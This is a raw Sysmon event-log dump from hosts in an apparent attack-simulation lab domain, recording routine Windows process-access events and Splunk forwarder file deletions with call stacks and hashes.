07:51:33.124{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.108{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.093{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:33.093{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.093{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:33.093{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.077{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.077{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:33.077{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.077{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.024{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:33.024{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:33.011{466BC892-F484-60EB-257D-00000000CF01}76681724C:\Windows\system32\conhost.exe{466BC892-F484-60EB-247D-00000000CF01}9640C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:32.993{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F484-60EB-257D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x8000000000000000807473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:34.977{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A499489E3CD28DFFA892CB6770128C35,SHA256=5F343D294D400944BD959C2A67DEF2A35E39E7A66F95895027CE317F73DDB311,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001048317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:34.530{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C579042A7C74BAF88BDC233C3AA4CA2B,SHA256=4A3BFA99932684C94E51C6668D5B6E8C6F77B9F4800E96026D2166020D610E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:35.531{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A7AA034536D350CCA61FA4036B39EC5,SHA256=9BF81B85533002244F00C18662FF2D7CEC9548D22F34B88D033BBF2E4FC86BFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.846{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001048368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.846{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.846{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RP
CRT4.dll+1ae1c 10341000x80000000000000001048359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:36.830{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
